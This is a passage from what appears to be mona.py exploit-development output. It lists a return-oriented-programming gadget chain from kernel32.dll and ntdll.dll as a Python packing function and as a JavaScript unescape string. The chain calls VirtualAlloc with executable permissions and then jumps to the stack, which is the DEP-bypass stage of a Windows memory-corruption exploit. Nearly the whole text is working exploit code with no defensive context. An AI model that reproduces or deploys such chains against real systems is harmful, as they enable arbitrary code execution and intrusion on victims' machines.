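        0x75369e72,  # POP EAX # RETN [KERNEL32.DLL]
        0x90909090,  # nop
        0x77a8cd5c,  # PUSHAD # RETN [ntdll.dll]
    ]
    # b''.join works on Python 2 (str is bytes) and Python 3 alike; the
    # original ''.join raises TypeError on Python 3 because struct.pack
    # returns bytes.
    return b''.join(struct.pack('<I', gadget) for gadget in rop_gadgets)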
# Packed 68-byte chain (17 little-endian dwords) in stack order.
rop_chain = create_rop_chain()
*** [ JavaScript ] ***
//rop chain generated with mona.py - www.corelan.be
rop_gadgets = unescape(
"%u71d2%u753b" + // 0x753b71d2 : ,# POP EAX # RETN [KERNEL32.DLL]
"%u06fc%u753c" + // 0x753c06fc : ,# ptr to &VirtualAlloc() [IAT KERNEL32.DLL]
"%ue737%u7539" + // 0x7539e737 : ,# MOV EAX,DWORD PTR DS:[EAX] # RETN [KERNEL32.DLL]
"%u3d46%u7538" + // 0x75383d46 : ,# XCHG EAX,ESI # RETN [KERNEL32.DLL]
"%ufa0b%u753a" + // 0x753afa0b : ,# POP EBP # RETN [KERNEL32.DLL]
"%u6dc7%u7535" + // 0x75356dc7 : ,# & call esp [KERNEL32.DLL]
"%u89a9%u77ab" + // 0x77ab89a9 : ,# POP EBX # RETN [ntdll.dll]
"%u0001%u0000" + // 0x00000001 : ,# 0x00000001-> ebx
"%u7065%u77a8" + // 0x77a87065 : ,# POP EDX # RETN [ntdll.dll]
"%u1000%u0000" + // 0x00001000 : ,# 0x00001000-> edx
"%u4a71%u77ab" + // 0x77ab4a71 : ,# POP ECX # RETN [ntdll.dll]
"%u0040%u0000" + // 0x00000040 : ,# 0x00000040-> ecx
"%u835c%u77a8" + // 0x77a8835c : ,# POP EDI # RETN [ntdll.dll]
"%u0883%u77b4" + // 0x77b40883 : ,# RETN (ROP NOP) [ntdll.dll]
"%u9e72%u7536" + // 0x75369e72 : ,# POP EAX # RETN [KERNEL32.DLL]
"%u9090%u9090" + // 0x90909090 : ,# nop
"%ucd5c%u77a8" + // 0x77a8cd5c : ,# PUSHAD # RETN [ntdll.dll]
""); // :
--------------------------------------------------------------------------------------------------